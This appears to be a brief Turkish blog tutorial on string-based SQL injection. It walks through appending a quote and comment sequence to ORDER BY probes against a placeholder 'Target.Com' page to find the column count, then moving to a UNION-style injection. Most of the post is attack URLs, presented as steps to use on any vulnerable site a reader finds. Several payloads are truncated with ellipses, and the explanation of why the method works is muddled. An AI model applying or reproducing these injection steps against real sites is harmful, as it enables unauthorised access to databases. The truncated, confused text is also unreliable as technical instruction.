Savunmasız SQL açıklı Bir Site Bulduğunuzda Order By Komutunu Ne Kadar Yazsakta Hata Alamazsak ?
Order By Komutu İşe Yaramazsa?
Bu Muhtemelen Dize Esaslı Enjeksiyon Kullanmak Zorunda Olduğumuzu Gösterir.
İlk Olarak Sitede SQL Hatası Almalıyız, Zaten Herkes Almayı Biliyor Varsayıyorum.
Http://Target.Com/injectpoint.php?ID=10'
Komutu Deneyelim;
Http://Target.Com/injectpoint.php?ID=10+order+by+1--
Herhangi Bir Hata Alamazsınız, ve Bu Komut 10000'e Doğru Uzar Gider.
Http://Target.Com/injectpoint.php?ID...+by+10000000--
Hala Hatadan Eser Yok…
Bu Komutu Deneyelim bir de;
Http://Target.Com/injectpoint.php?ID=10'+order+by+1--+-
Hala Hiçbir Hata Yok, Genellikle Tek Kolondan Oluşmaz
Çünkü Kolon Sayısı, O halde Siz, Bu Komutu Deneyeceksiniz;
Http://Target.com/injectpoint.php?ID...+by+100000--+-
Hatayı Aldık!
Çünkü Bir Sitede 100000 Kolon Olması İmkansız Gibi Birşey
ve String (Dize) Yöntemini Gerçekleştirdik.
Son Olarak Düzenli Bir SQL İnjection Komutu Haline Getirelim;
Http://Target.Com/injectpoint.php?ID...rder+by+10--+-
10. Kolonda Hatayı Verir Varsayıyorum.
ve Kolon Sayımız 9 Olarak Bulunur, Ardından;
Http://Target.Com/injectpoint.php?ID=10'+order+by+9--+-
Ekrana Kullanacağımız Kolon Sayıları Vurulur
Sonrasında Normal Injeksiyon Yapabiliriz;
Http://Target.Com/injectpoint.php?ID...,5,6,7,8,9--+-
Sizlerle String (Dize) Tabanlı Bir SQL Enjeksiyon Gerçekleştirmiş Olduk..
Hiç yorum yok:
Yorum Gönder